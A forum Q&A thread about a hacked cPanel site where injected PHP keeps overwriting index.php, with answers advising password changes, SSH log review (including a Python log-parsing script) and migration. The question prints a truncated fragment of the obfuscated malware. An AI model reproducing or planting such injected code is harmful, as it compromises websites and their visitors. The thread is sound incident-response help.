
In my CPanel under public_html (website root), index.php is overwriting any index.php file with the following code (;_;)

<?php $z1OYQeXkoA='*3wO*bE*3w/*aY*3w,#*3wO*bE*3w/*aY*3w#,*2wT*aI*1wP*bR,#*2wT*aI*1wP*bR#,*1wn*bm*2wn*aR*1w,#*1wn*bm*2wn*aR*1w#,*4wO*bp*1wm*aM*3w,#*4wO*bp*1wm*aM*3w#,*1wX*bq*5wY*aU,#*1wX*bq*5wY*aU#,*4ww*aL*5wL*bV*2w,#*4ww*aL*5wL*bV*2w#,*1wh*bT*4wI*aa,#*1wh*bT*4wI*aa#,*4wM*ba*4wt*ai*4w,#*4wM*ba*4wt*ai*4w#,*4wA*btD*aO*2w,#*4wA*btD*aO*2w#,L*aA*3wQ*bo*2w,#L*aA*3wQ*bo*2w#,*4wV*bAC*a/*2w,#*4wV*bAC*a/*2w#,*4wy*bx*1wo*ak*4w,#*4wy*bx*1wo*ak*4w#,*2ws*aj*5wa*bY*3w,#*2ws*aj*5wa*bY*3w#,*4wj*aN*1wr*bO*4w,#*4wj*aN*1wr*bO*4w#,*5wz*awH*bF*4w,#*5wz*awH*bF*4w#,K*bC*4wa*as,#K*bC*4wa*as#,*2wN*al*4wU*bz*2w,#*2wN*al*4wU*bz*2w#,*3wq*bL*4wJ*aF*1w,#*3wq*bL*4wJ*aF*1w#,*3wp*af*4wj*bu*2w,#*3wp*af*4wj*bu*2w#,*5wF*bZ*1wq*aD,#*5wF*bZ*1wq*aD#,*1wo*bw*4   --like this(*code is too long)

3 Answers


  1. Seems like your server has been compromised. Try to clean the server, change the passwords (all FTP, cPanel) and try to upload the files.

  2. Firstly, I would change all the passwords to your CPanel. It does sound like someone has pwned your server as @delboy1978uk said. I have slightly limited knowledge in CPanel but from what I do know, it doesn’t normally write to files apart from .htaccess and some config files.

    If you have SSH access to your server, I would also have a look at the SSH connections that have been successful, as that will show you if someone else has had an SSH connection to your server. You will most likely find these here:

    /var/log/secure
    /var/log/messages
    

    I would also advise that you invest in setting up your own VPS for your websites, as you will have more control over the server. Granted, shared hosting can take a lot of the pain away, but it can also be a pain to debug issues, including this one. You can use something like DigitalOcean or Vultr, as these are really cheap and have high performance.

    If you have no real experience with setting up LAMP or LEMP stacks, you can also use the tutorials on DigitalOcean on how to do this. You can even buy your own copy of CPanel and install it on the server if you are really familiar with CPanel and want to keep the same interface.

    I hope this helps and gives you a little more information.
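
The log review suggested in the answer above, as an added example that is not part of the original answer: it pulls successful SSH logins out of `/var/log/secure` and groups those coming from addresses you do not recognise. The sample lines, host name, user name and IP addresses are constructed, and the pattern assumes the traditional syslog timestamp format.

```python
import re
import sys
from collections import defaultdict

# OpenSSH logs a successful login as "Accepted <method> for <user> from <ip> port <n>".
# Anchoring on the sshd tag keeps "Failed password" lines and other daemons out.
ACCEPTED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s+\S+\s+sshd\[\d+\]:\s+"
    r"Accepted\s+(?P<method>\S+)\s+for\s+(?P<user>\S+)\s+from\s+(?P<ip>\S+)\s+port\s+\d+"
)

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = """\
Jan  4 08:15:00 web01 sshd[1001]: Accepted publickey for siteuser from 192.0.2.10 port 40010 ssh2
Jan 12 03:14:07 web01 sshd[2211]: Failed password for root from 203.0.113.45 port 51120 ssh2
Jan 12 03:14:09 web01 sshd[2211]: Accepted password for siteuser from 203.0.113.45 port 51122 ssh2
Jan 12 09:30:41 web01 sshd[3320]: Accepted publickey for siteuser from 192.0.2.10 port 40022 ssh2: RSA SHA256:placeholder
Jan 13 22:05:13 web01 sshd[4417]: Accepted password for siteuser from 203.0.113.45 port 51990 ssh2
"""


def successful_logins(lines):
    """Yield one dict (ts, method, user, ip) per successful SSH login."""
    for line in lines:
        m = ACCEPTED.match(line)
        if m:
            yield m.groupdict()


def unexpected_logins(lines, known_ips):
    """Group successful logins from addresses outside known_ips by (user, ip)."""
    hits = defaultdict(list)
    for rec in successful_logins(lines):
        if rec["ip"] not in known_ips:
            hits[(rec["user"], rec["ip"])].append((rec["ts"], rec["method"]))
    return dict(hits)


if __name__ == "__main__":
    # Usage: python ssh_logins.py /var/log/secure <your-ip> [<your-ip> ...]
    if len(sys.argv) > 1:
        with open(sys.argv[1], errors="replace") as fh:
            lines, known = fh.readlines(), set(sys.argv[2:])
    else:
        lines, known = SAMPLE_LOG.splitlines(), {"192.0.2.10"}
    for (user, ip), events in unexpected_logins(lines, known).items():
        print(f"{user} from {ip}: {len(events)} login(s), "
              f"first {events[0][0]}, last {events[-1][0]}")
```

Compare the timestamps it reports with the modification times of the overwritten index.php files; on Debian-based systems the same lines are in `/var/log/auth.log`.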

  3. Your server/account has been compromised. The immediate solution is to move all your data to another server with strong passwords; use a private/public key pair if possible. Also, if you can use a VPS, avoid using cpanel or a similar application.

    The more time you take to move the files, the more it will affect.
